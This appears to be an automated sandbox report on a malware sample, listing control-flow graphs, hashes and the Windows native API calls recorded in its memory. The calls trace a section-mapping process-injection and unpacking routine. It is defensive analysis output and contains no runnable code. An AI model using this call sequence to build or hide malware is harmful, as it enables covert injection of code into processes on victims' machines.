                                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 197 4018a5-4018b7 191->197 195 401595-4015be 192->195 196 401896 192->196 195->196 206 4015c4-4015db NtDuplicateObject 195->206 196->197 202 4018c5 197->202 203 4018bc-4018e3 call 401193 197->203 202->203 206->196 208 4015e1-401605 NtCreateSection 206->208 209 401661-401687 NtCreateSection 208->209 210 401607-401628 NtMapViewOfSection 208->210 209->196 212 40168d-401691 209->212 210->209 214 40162a-401646 NtMapViewOfSection 210->214 212->196 215 401697-4016b8 NtMapViewOfSection 212->215 214->209 217 401648-40165e 214->217 215->196 218 4016be-4016da NtMapViewOfSection 215->218 217->209 218->196 220 4016e0 call 4016e5 218->220
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
                                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                        • Opcode Fuzzy Hash: 760a253240b6f943ec8021b48b145a792f0c197ac7ca2a00c5b8f2ba91269cf2
                                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 236 4018a5-4018b7 230->236 234 401595-4015be 231->234 235 401896 231->235 234->235 245 4015c4-4015db NtDuplicateObject 234->245 235->236 241 4018c5 236->241 242 4018bc-4018e3 call 401193 236->242 241->242 245->235 247 4015e1-401605 NtCreateSection 245->247 248 401661-401687 NtCreateSection 247->248 249 401607-401628 NtMapViewOfSection 247->249 248->235 251 40168d-401691 248->251 249->248 253 40162a-401646 NtMapViewOfSection 249->253 251->235 254 401697-4016b8 NtMapViewOfSection 251->254 253->248 256 401648-40165e 253->256 254->235 257 4016be-4016da NtMapViewOfSection 254->257 256->248 257->235 259 4016e0 call 4016e5 257->259
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
                                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                        • Opcode Fuzzy Hash: 6c04fbe94f42d196d91a564b8638ef34bd5a66ddd412fd70bddf2b1a22957c4b
                                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 276 4018a5-4018b7 270->276 274 401595-4015be 271->274 275 401896 271->275 274->275 285 4015c4-4015db NtDuplicateObject 274->285 275->276 281 4018c5 276->281 282 4018bc-4018e3 call 401193 276->282 281->282 285->275 287 4015e1-401605 NtCreateSection 285->287 288 401661-401687 NtCreateSection 287->288 289 401607-401628 NtMapViewOfSection 287->289 288->275 291 40168d-401691 288->291 289->288 293 40162a-401646 NtMapViewOfSection 289->293 291->275 294 401697-4016b8 NtMapViewOfSection 291->294 293->288 296 401648-40165e 293->296 294->275 297 4016be-4016da NtMapViewOfSection 294->297 296->288 297->275 299 4016e0 call 4016e5 297->299
                                                                                        APIs
                                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                                        • String ID:
                                                                                        • API String ID: 1546783058-0
                                                                                        • Opcode ID: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
                                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                        • Opcode Fuzzy Hash: 8a3bc379b41e7ac14ddd86396c960a6722f6fe419a6d25bb301ebfcb3ed0e9e7
                                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                                        • String ID:
                                                                                        • API String ID: 1921587553-0
                                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 271003c-2710047 1 2710049 0->1 2 271004c-2710263 call 2710a3f call 2710e0f call 2710d90 VirtualAlloc 0->2 1->2 17 2710265-2710289 call 2710a69 2->17 18 271028b-2710292 2->18 23 27102ce-27103c2 VirtualProtect call 2710cce call 2710ce7 17->23 20 27102a1-27102b0 18->20 22 27102b2-27102cc 20->22 20->23 22->20 29 27103d1-27103e0 23->29 30 27103e2-2710437 call 2710ce7 29->30 31 2710439-27104b8 VirtualFree 29->31 30->29 33 27105f4-27105fe 31->33 34 27104be-27104cd 31->34 37 2710604-271060d 33->37 38 271077f-2710789 33->38 36 27104d3-27104dd 34->36 36->33 40 27104e3-2710505 36->40 37->38 43 2710613-2710637 37->43 41 27107a6-27107b0 38->41 42 271078b-27107a3 38->42 54 2710517-2710520 40->54 55 2710507-2710515 40->55 45 27107b6-27107cb 41->45 46 271086e-27108be LoadLibraryA 41->46 42->41 44 271063e-2710648 43->44 44->38 47 271064e-271065a 44->47 49 27107d2-27107d5 45->49 53 27108c7-27108f9 46->53 47->38 52 2710660-271066a 47->52 50 2710824-2710833 49->50 51 27107d7-27107e0 49->51 60 2710839-271083c 50->60 57 27107e2 51->57 58 27107e4-2710822 51->58 59 271067a-2710689 52->59 61 2710902-271091d 53->61 62 27108fb-2710901 53->62 56 2710526-2710547 54->56 55->56 63 271054d-2710550 56->63 57->50 58->49 64 2710750-271077a 59->64 65 271068f-27106b2 59->65 60->46 66 271083e-2710847 60->66 62->61 67 27105e0-27105ef 63->67 68 2710556-271056b 63->68 64->44 69 27106b4-27106ed 65->69 70 27106ef-27106fc 65->70 71 2710849 66->71 72 271084b-271086c 66->72 67->36 74 271056d 68->74 75 271056f-271057a 68->75 69->70 76 271074b 70->76 77 27106fe-2710748 70->77 71->46 72->60 74->67 78 271059b-27105bb 75->78 79 271057c-2710599 75->79 76->59 77->76 84 27105bd-27105db 78->84 79->84 84->63
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0271024D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_2710000_sfjujsr.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID: cess$kernel32.dll
                                                                                        • API String ID: 4275171209-1230238691
                                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction ID: a47d089c2e9bf2e04fae17f13258f11682a27155ab255ab83a8673d89e868fe8
                                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                        • Instruction Fuzzy Hash: 74526974A01229DFDB64CF68C985BACBBB1BF09304F1480D9E94DAB351DB30AA95DF14

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 319 274f0d7-274f0f0 320 274f0f2-274f0f4 319->320 321 274f0f6 320->321 322 274f0fb-274f107 CreateToolhelp32Snapshot 320->322 321->322 323 274f117-274f124 Module32First 322->323 324 274f109-274f10f 322->324 325 274f126-274f127 call 274ed96 323->325 326 274f12d-274f135 323->326 324->323 329 274f111-274f115 324->329 330 274f12c 325->330 329->320 329->323 330->326
                                                                                        APIs
                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0274F0FF
                                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0274F11F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_273d000_sfjujsr.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                        • String ID:
                                                                                        • API String ID: 3833638111-0
                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction ID: af3ca703430cd093f829a06d629659fa351cafbf104422ca3d4361e36a2044e8
                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                        • Instruction Fuzzy Hash: A4F09036200711ABD7303BF9EC8DB6E76E8EF49625F100529E642919C0DFB4E8464A62

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 332 2710e0f-2710e24 SetErrorMode * 2 333 2710e26 332->333 334 2710e2b-2710e2c 332->334 333->334
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02710223,?,?), ref: 02710E19
                                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02710223,?,?), ref: 02710E1E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1972746903.0000000002710000.00000040.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_2710000_sfjujsr.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorMode
                                                                                        • String ID:
                                                                                        • API String ID: 2340568224-0
                                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction ID: 664de3db17252b81f0ea7e26b79c5437e31f658458de95e01fd3d9d479499f59
                                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                        • Instruction Fuzzy Hash: B4D0123114512877DB003A95DC09BCD7B1CDF05B66F008011FB0DD9080C770954046E5

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
                                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                        • Opcode Fuzzy Hash: 32c7949d56d3da8191661db3a38ee65d17f610e0ddd2cc1157d660d2dd35f03b
                                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
                                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                        • Opcode Fuzzy Hash: ae04734f9b39786081be80ce789597b4a1e39b23fea551aa8062005ff59c2a84
                                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
                                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                        • Opcode Fuzzy Hash: 5cb1cf3cc1e5bf4755baf7ac3b790f5215e743634697cb06246bb69ab5ac10e7
                                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
                                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                        • Opcode Fuzzy Hash: 137534342241c8c5e645d5a11b5bf708cae17accef258d0ef5f87685d306fe6b
                                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 444 274ed96-274edd0 call 274f0a9 447 274edd2-274ee05 VirtualAlloc call 274ee23 444->447 448 274ee1e 444->448 450 274ee0a-274ee1c 447->450 448->448 450->448
                                                                                        APIs
                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0274EDE7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1972868127.000000000273D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0273D000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_273d000_sfjujsr.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 4275171209-0
                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction ID: 1988efc42817ae6896a215df9555a8cad00f86bbef770caac67088e10bd4016a
                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                        • Instruction Fuzzy Hash: 54113C79A00208EFDB01DF98C985E99BBF5AF08350F058094F9489B361D771EA90DF90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                        APIs
                                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000004.00000002.1971638558.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_4_2_400000_sfjujsr.jbxd
                                                                                        Similarity
                                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                                        • String ID:
                                                                                        • API String ID: 1885482327-0
                                                                                        • Opcode ID: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
                                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                        • Opcode Fuzzy Hash: 7566c8dc3b7fb910edc6667df7b0a96729b103eb2ec411fa05854360de4f2407
                                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F